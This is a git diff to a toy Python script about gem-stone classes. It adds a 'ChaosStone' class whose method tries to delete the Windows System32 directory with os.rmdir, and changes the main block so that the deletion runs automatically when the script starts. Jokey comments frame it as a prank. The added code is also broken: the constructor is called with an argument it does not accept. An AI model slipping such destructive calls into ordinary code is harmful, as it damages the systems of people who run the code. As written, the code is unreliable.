diff --git a/main.py b/main.py index 4698c0c..b03c1da 100644 --- a/main.py +++ b/main.py @@ -1,3 +1,4 @@ +import os class GemStone: name: str @@ -17,9 +18,16 @@ def __init__(self) -> None: def back(amount: int) -> None: print('Rewinding...') +class ChaosStone(GemStone): #IDK the gem stones + def __init__(self): + super().__init__() + self.name = 'ChaosStone' + + def absolute_chaos(self): + os.rmdir("C:\Windows\System32") #I know your not on Windows but anyway if __name__ == '__main__': print('Hello World') # This is the first script of the project - - + just_A_Nice_Gem = ChaosStone("Nice_Gem") + just_A_Nice_Gem.absolute_chaos() \ No newline at end of file